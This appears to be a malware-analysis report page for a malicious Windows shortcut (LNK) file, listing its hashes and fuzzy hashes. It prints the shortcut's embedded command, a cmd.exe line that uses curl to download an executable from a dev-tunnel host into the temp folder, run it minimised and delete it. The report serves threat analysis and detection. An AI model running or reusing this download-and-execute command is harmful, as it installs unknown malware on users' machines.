Malicious
Malicious

01b57db0a8c70ce26680f27601617674

LNK File
|
MD5: 01b57db0a8c70ce26680f27601617674
|
Size: 1.66 KB
|
application/x-ms-shortcut


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
01b57db0a8c70ce26680f27601617674
Sha1
78f87f75f97d2565326f5ced0ae9cee8c5b0d79b
Sha256
c91eeebe190c5758097978ce3748d86dc6f4ef3a8d0ea24ac2be1d87ae6af030
Sha384
b6ec1fb7c40ee766c2ac292ecf3dbfe7b99a26f86567a0a0e4ae65919c9dea43ecae9061157b01a9bdadef42bd6d00e6
Sha512
4452922fdbc7996b0c2e1ad0b71884a8e530debda951021981b68fe557d93c48f2f98b25285beda2f14008fefb0b4e7cd2a908ad278e906320d5e70a7c12727f
SSDeep
24:8VuJI5UmtJ1TAY8P5J+/2YyJi5iFfa4A+U/FIP4I0aA3yUUXQaR3+9h/LnU+Y+/e:8x+1FXJi5NNxfIPzXv3WzU+Yk
TLSH
4B319D652BD90329D3B2CA3B54B5E3924A33B950E9738F8D4290D29C2C65600E836F6B
File Structure
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /c "curl -s -L -o %TEMP%\loader.exe https://wpgbf1zg-5500.euw.devtunnels.ms/free.exe && start /min cmd /c "%TEMP%\loader.exe & del %TEMP%\loader.exe""

01b57db0a8c70ce26680f27601617674 (1.66 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙